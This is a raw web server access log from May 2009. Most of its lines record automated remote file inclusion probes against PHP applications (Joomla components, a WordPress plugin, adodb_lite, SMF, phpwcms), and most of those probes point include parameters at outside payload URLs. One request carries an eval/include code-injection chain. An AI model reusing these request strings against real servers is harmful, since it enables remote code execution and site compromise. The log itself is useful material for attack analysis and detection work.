62.146.68.61 - - [29/May/2009:00:14:06 -0400] "GET /logs/access_log.Q109021500%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.249.68.17 - - [29/May/2009:00:14:06 -0400] "GET /logs/error_log.Q107092300 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.146.68.61 - - [29/May/2009:00:14:09 -0400] "GET /logs/error_log.Q108052600%20%20//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:14:12 -0400] "GET /logs/error_log.Q108052600%20%20//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:14:20 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:14:20 -0400] "GET /logs/access_log.Q109052100%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:14:20 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:14:20 -0400] "GET /logs/access_log.Q109050300%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:14:31 -0400] "GET /logs/access_log.Q109021500%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
77.221.130.4 - - [29/May/2009:00:14:31 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
77.221.130.4 - - [29/May/2009:00:14:33 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
65.98.80.2 - - [29/May/2009:00:15:30 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:15:30 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:15:30 -0400] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
116.36.213.166 - - [29/May/2009:00:16:02 -0400] "GET /logs/access_log.Q109051100%20%20//include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:16:35 -0400] "GET /logs/error_log.Q109050500//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:16:50 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:16:50 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:16:50 -0400] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:16:53 -0400] "GET /logs/error_log.Q108052600//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:00:17:04 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:00:17:04 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:00:17:04 -0400] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:17:06 -0400] "GET /logs/access_log.Q109050900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
77.221.130.4 - - [29/May/2009:00:17:08 -0400] "GET /logs/access_log.Q109052200//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
77.221.130.4 - - [29/May/2009:00:17:08 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
77.221.130.4 - - [29/May/2009:00:17:08 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 3299 "-" "libwww-perl/5.805"
77.221.130.4 - - [29/May/2009:00:17:09 -0400] "GET /logs/access_log.Q109052200//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
121.188.91.69 - - [29/May/2009:00:17:09 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:00:17:09 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
77.221.130.4 - - [29/May/2009:00:17:09 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
121.188.91.69 - - [29/May/2009:00:17:09 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.221.130.4 - - [29/May/2009:00:17:09 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 3299 "-" "libwww-perl/5.805"
89.108.64.88 - - [29/May/2009:00:17:10 -0400] "GET /logs/access_log.Q109052100////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.812"
89.108.64.88 - - [29/May/2009:00:17:10 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.812"
89.108.64.88 - - [29/May/2009:00:17:11 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt??? HTTP/1.1" 200 3301 "-" "libwww-perl/5.812"
65.98.80.2 - - [29/May/2009:00:17:14 -0400] "GET /logs/access_log.Q109052200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:00:17:15 -0400] "GET /convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:00:17:15 -0400] "GET /logs/access_log.Q108020900/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:00:17:15 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:00:17:15 -0400] "GET /convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:00:17:15 -0400] "GET /logs/access_log.Q108020900/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:00:17:15 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.108.64.88 - - [29/May/2009:00:17:17 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.812"
89.108.64.88 - - [29/May/2009:00:17:17 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.812"
65.23.158.226 - - [29/May/2009:00:17:19 -0400] "GET /logs/access_log.Q108031900/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:00:17:19 -0400] "GET /logs/access_log.Q108031900/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:00:17:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.188.91.69 - - [29/May/2009:00:17:36 -0400] "GET /logs/access_log.Q108121900%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
89.108.64.88 - - [29/May/2009:00:17:40 -0400] "GET /logs/access_log.Q109052100////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.812"
89.108.64.88 - - [29/May/2009:00:17:40 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.812"
89.108.64.88 - - [29/May/2009:00:17:41 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt??? HTTP/1.1" 200 3301 "-" "libwww-perl/5.812"
77.221.130.4 - - [29/May/2009:00:18:00 -0400] "GET /logs/error_log.Q109011700//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.130.4 - - [29/May/2009:00:18:00 -0400] "GET /logs/error_log.Q109011700//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
121.188.91.69 - - [29/May/2009:00:18:06 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:00:18:06 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:00:18:06 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:00:18:22 -0400] "GET /logs/access_log.Q108020900%20%20/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:00:18:23 -0400] "GET /logs/access_log.Q108031900%20%20/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:18:23 -0400] "GET /logs/access_log.Q109050900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
123.125.64.51 - - [29/May/2009:00:18:24 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.23.158.226 - - [29/May/2009:00:18:25 -0400] "GET /logs/access_log.Q108020900%20%20/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:00:18:25 -0400] "GET /logs/access_log.Q108031900%20%20/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:18:31 -0400] "GET /logs/access_log.Q109052200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
89.108.64.88 - - [29/May/2009:00:18:38 -0400] "GET /logs/access_log.Q109013000////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.812"
121.188.91.69 - - [29/May/2009:00:18:39 -0400] "GET /logs/access_log.Q108121900%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
89.108.64.88 - - [29/May/2009:00:18:46 -0400] "GET /logs/access_log.Q109013000////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.812"
216.221.10.116 - - [29/May/2009:00:18:56 -0400] "GET /logs/access_log.Q109050900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:00:19:03 -0400] "GET /logs/access_log.Q108091400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:00:19:05 -0400] "GET /logs/access_log.Q109052200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:19:24 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:19:24 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:19:24 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:20:09 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:00:20:11 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:00:20:12 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:00:20:13 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
123.125.64.49 - - [29/May/2009:00:20:21 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
112.175.141.41 - - [29/May/2009:00:20:59 -0400] "GET /logs/access_log.Q108121900%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:00:21:23 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:00:21:23 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:00:21:23 -0400] "GET /logs/access_log.Q108020900/convert/mvcw.php?step=1&vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:00:21:28 -0400] "GET /logs/access_log.Q108031900/convert/mvcw.php?step=1&vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:21:39 -0400] "GET /logs/local.php?cfg[path][contenido]=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:21:39 -0400] "GET /local.php?cfg[path][contenido]=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:21:57 -0400] "GET /logs/index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:21:57 -0400] "GET /index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:21:57 -0400] "GET /logs/access_log.Q109021500%20%20/index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:00:22:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.94.125.100 - - [29/May/2009:00:22:32 -0400] "GET /logs/access_log.Q108020900%20%20/convert/mvcw.php?step=1&vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:00:22:32 -0400] "GET /logs/access_log.Q108031900%20%20/convert/mvcw.php?step=1&vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:22:54 -0400] "GET /logs/access_log.Q109013000%20%20/index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:23:31 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:23:31 -0400] "GET /logs/access_log.Q109051700//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:23:31 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:00:23:36 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:00:23:36 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:00:23:36 -0400] "GET /logs/access_log.Q109051700//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:23:40 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:23:40 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:23:40 -0400] "GET /logs/access_log.Q109051700//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:00:23:48 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:00:23:48 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:00:23:49 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:24:20 -0400] "GET /logs/error_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:00:24:29 -0400] "GET /logs/access_log.Q108121900%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:24:47 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:00:24:49 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:24:58 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:00:25:05 -0400] "GET /logs/error_log.Q108051600/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
65.23.158.226 - - [29/May/2009:00:25:07 -0400] "GET /logs/error_log.Q108051600/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:25:09 -0400] "GET /phphtml.php?htmlclass_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:25:09 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:25:09 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:00:25:19 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:00:25:19 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
